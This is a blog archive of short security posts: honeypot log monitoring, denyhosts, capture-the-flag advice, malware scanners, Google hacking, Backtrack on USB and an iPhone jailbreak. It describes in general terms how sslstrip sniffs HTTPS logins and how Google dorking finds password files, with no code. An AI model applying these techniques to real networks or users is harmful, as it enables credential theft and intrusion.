Oct 8
Posted by The Gunslinger in hardware & software, security | 1 Comment
This is a must read if you’re a pen tester or PHP developer. Some great things on PHP security including file include, upload vulnerabilities, command execution, and of course SQL injection…
Blackhat Forums
Author: Aelphaeis Mangarae
Date: June 13, 2009
Sep 12
Posted by The Gunslinger in microsoft, security | No Comments
I recently setup a honeypot share on a Windows server. I put some very “interesting” files and directories in there (financial information, PII etc) and then enabled audit logging in Windows. There’s a very powerful but mostly unknown Windows tool called LogParser which can be used to query your System/Security event logs. It’s possible to write a script that will query your system security log every so often and look for requests to the honey pot. You can get very sophisticated using LogParser, a few hand written scripts, and the Windows Task Scheduler.
In case you’re still running sshd on port 22 (which you should change!) you’re probably getting hammered with brute force attempts. Take a peak at /var/log/secure or /var/log/wtmp or the “last” command and have a looksy.
There’s a great little application called “denyhosts” which will automatically add suspected brute forcers to your DENY list.
URL : http://denyhosts.sourceforge.net/
License : GPLv2
Description: DenyHosts is a Python script that analyzes the sshd server log
: messages to determine which hosts are attempting to hack into your
: system. It also determines what user accounts are being targeted.
: It keeps track of the frequency of attempts from each host and,
: upon discovering a repeated attack host, updates the
: /etc/hosts.deny file to prevent future break-in attempts from that
: host. Email reports can be sent to a system admin.
Jul 23
Posted by The Gunslinger in forensics, hardware & software, news | 1 Comment
Penetration Testing
Nowadays penetration testing is where it’s at. Whether trying to learn security, becoming a white hat, or consulting it’s a must have skill. However, it can be intimidating on where to start. Besides picking up books the next best way to learn is through capture the flag events.
Important truths about pen testing
Capture the Flag
Computer/hacking capture the flag events are usually team based timed events where you’re pitted against several opponents and trying to earn the highest score. Points are awarded for both offensive and defensive maneuvers. Typically each team will have a virtual machine they need to defend while trying to exploit vulnerabilities in other team’s VM.
The best place to find one in your area (besides attending a con) is your local 2600 chapter. If they don’t hold CTFs then try a local information security club. If you live in the mountains and can’t find either you can use Hack This Site which runs virtual CTF events 24/7.
Remember, hacker (white hat) and cracker (black hat).
Jul 17
Posted by The Gunslinger in hardware & software, malware | No Comments
Several weeks ago I posted about different free malware analyzers (sandbox environments). I’ve stumbled across another free tool from Mandiant which is their Red Curtain offering. Red Curtain will scan a given local directory or drive and analyze each file assigning it a threat score. It takes into effect whether the file is signed, packing, and the entropy which could be suspicious.
Another plus is the tool can be remotely deployed which is great for LAN & enterprise environments.
*I believe all their tools only run on Windows.
Google hacking has been around for a while but unfortunately it is still very relevant. Basically because the Google crawler is so powerful you can use this to your advantage to discover sensitive data. You can find password files as well as locating vulnerable versions of web servers, forum software, etc….
Google hacking database: http://www.hackersforcharity.org/ghdb/
Jul 7
Posted by The Gunslinger in hardware & software, news | No Comments
I’ve always found it a major pain to correctly install a Live CD on a thumb drive. You want to do this because of SPEED. Have you tried running Backtrack from a thumb drive? Load times are incredible and there’s none of that annoying spin of the cd drive. Of course it’s faster, you’re comparing optical media to solid state. Just like my R1 to your Civic SI….
The tool could not be simpler, feed it any .ISO and tell it which mounted device it should install to. It will handle creating the necessary [boot] partitions and sizing accordingly. So far I’ve tried it with Backtrack 3, 4 and Helix.
Download the multi-platform tool here: http://unetbootin.sourceforge.net/
Tags: backtrack, helix, live cd, unetbootin
I just came across these steps in Wired to unlock your iPhone:
1. Update iTunes and Iphone app installe
3. Select “simple mode” and install Cydia
*If anything goes wrong you can reverse the process using the iTunes System restore.
**I don’t own an iPhone. I use a Blackberry because I would rather accidentally leave a Blackberry lying around then an iPhone. There’s no comparison in terms of privacy, encryption, and the confidentiality of your data. Maybe this will warrant a future post…
At the recent Google I/O conference in San Francisco the next big Google project was announced, Google Wave. Imagine being able to instant message and collaborate with multiple people in real time. Now chat rooms have been around for a while real time collaboration is a new concept. Wave is so much more than an IRC chatroom; Wave allows users to include rich media in the conversations as well as adding people on the fly. You can add users to the “Wave” at anytime. New users added to a Wave can then “Replay” the Wave to see what they missed. A Wave is built using a tree structure which allows for the replay.
Imagine having a blog + chatroom + flickr all with collaborative “wiki” abilities. I’ll be the first to admit it is difficult to wrap your head around.
Definitely check out the developer preview video here.
There’s a nice tool that will perform SSL man in the middle attacks. In layman’s terms this means when this tool is run on a gateway it will create a clear text HTTP stream on the network (that you can sniff) when someone creates a HTTPS session. i.e. Someone logs into Gmail via HTTPS and there will be an HTTP clear text mirror of that session which you can sniff via Wireshark.
Check it out here: www.thoughtcrime.org/software/sslstrip/
You are currently browsing the archives for the hardware & software category.
Arclite theme by digitalnature | powered by WordPress